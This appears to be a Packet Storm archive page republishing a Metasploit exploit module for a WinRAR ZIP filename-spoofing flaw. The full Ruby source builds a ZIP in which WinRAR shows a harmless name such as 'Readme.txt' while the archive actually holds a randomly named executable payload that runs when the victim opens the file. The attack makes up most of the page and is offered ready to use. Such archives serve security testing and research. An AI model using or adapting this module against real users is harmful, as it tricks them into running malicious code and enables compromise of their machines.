exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WinRAR Filename Spoofing

WinRAR Filename Spoofing
Posted Apr 7, 2014
Authored by chr1x, juan vazquez | Site metasploit.com

This Metasploit module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from the central directory, but the file names used to extract and open contents come from the Local File Header. This inconsistency allows to spoof file names when opening ZIP files with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in March 2014.

tags | exploit, arbitrary, local, spoof
advisories | OSVDB-62610
SHA-256 | 77adfa4fa0e23c97becb1de4580cf456d6594ca7beef63394258815f48627e38

WinRAR Filename Spoofing

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'WinRAR Filename Spoofing',
'Description' => %q{
This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists
when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from
the central directory, but the file names used to extract and open contents come from the
Local File Header. This inconsistency allows to spoof file names when opening ZIP files
with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in
March 2014
},
'License' => MSF_LICENSE,
'Author' =>
[
'chr1x', # Vulnerability discoverer according to OSVDB
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '62610' ],
[ 'BID', '66383' ],
[ 'URL', 'http://securityaffairs.co/wordpress/23623/hacking/winrar-zero-day.html'],
[ 'URL', 'http://an7isec.blogspot.co.il/']
],
'Platform' => [ 'win' ],
'Payload' =>
{
'DisableNops' => true,
'Space' => 4096
},
'Targets' =>
[
[ 'Windows Universal', {} ]
],
'DisclosureDate' => 'Sep 28 2009',
'DefaultTarget' => 0))

register_options(
[
OptString.new('SPOOF', [ true, 'The spoofed file name to show', 'Readme.txt']),
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip'])
], self.class)

end

def exploit
exe_filename = rand_text_alpha(rand(6) + 1)
exe_filename << ".exe"

zip = Rex::Zip::Archive.new
zip.add_file(exe_filename, generate_payload_exe, nil, nil, datastore['SPOOF'])
pack = zip.pack

print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pack)
end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close